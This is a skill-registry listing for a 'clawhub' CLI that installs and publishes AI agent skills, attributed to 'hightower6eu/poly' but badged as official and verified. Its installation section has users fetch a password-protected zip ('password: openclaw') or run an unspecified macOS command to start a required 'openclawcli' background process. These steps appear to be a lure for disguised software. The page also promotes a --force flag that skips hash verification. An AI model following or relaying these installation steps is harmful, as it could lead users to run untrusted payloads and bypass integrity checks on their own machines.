ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified developer tools Safety 4/5

clawhub

Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.ai with advanced caching and compression. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with optimized performance.

Why use this skill?

Use ClawHub CLI to seamlessly search, install, update, and publish AI agent skills. Streamline your workflow with optimized caching and registry management.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/poly
Or

What This Skill Does

The ClawHub CLI is a powerful package management tool specifically designed for the OpenClaw ecosystem. It serves as the primary interface for interacting with the clawhub.ai registry, enabling users to search, install, update, and publish agent skills with ease. By leveraging advanced compression and caching algorithms, ClawHub ensures that skill deployment is fast, efficient, and reliable. Whether you are a developer looking to share your custom agents or a user needing to fetch specific functionality on the fly, ClawHub simplifies the complex lifecycle of AI agent management.

Installation

Before using the ClawHub CLI, you must install the openclawcli utility. For Windows, download the zip from the official repository (password: openclaw). For macOS, run the installation command provided on the snippets page. Once the base utility is running, install the CLI via npm: npm install -g clawhub. Ensure your environment path is configured to recognize the binary, and you are ready to manage your skills.

Use Cases

ClawHub is essential for maintaining a dynamic AI agent library. Developers use it to version control and publish new skills to the global repository. End-users utilize it to rapidly extend the capabilities of their existing agents—such as adding a specialized database connector or a new task automation workflow—without manually downloading and configuring individual files. It is also ideal for enterprise teams who need to synchronize a standardized suite of skills across multiple agent instances.

Example Prompts

  1. "ClawHub, search for available skills related to database automation and install the top-rated one in my './skills' directory."
  2. "Update all my installed skills to the latest versions using force mode to ensure no cache conflicts exist."
  3. "I have finished my custom agent build in the current folder; please publish it to the ClawHub registry as a new skill."

Tips & Limitations

Always ensure the openclawcli background process is running before executing commands; the CLI will fail otherwise. Use the --verbose flag during installations if you encounter network connectivity issues. When updating, leverage the --force flag only when troubleshooting version mismatches, as it skips hash verification. Note that publishing requires authentication via clawhub login. Since this tool interacts directly with your filesystem, ensure you have appropriate write permissions for the directory where you are installing skills.

Metadata

Stars2387
Views2
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-poly": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#cli#package-manager#automation#deployment
Safety Score: 4/5

Flags: network-access, file-write, file-read, external-api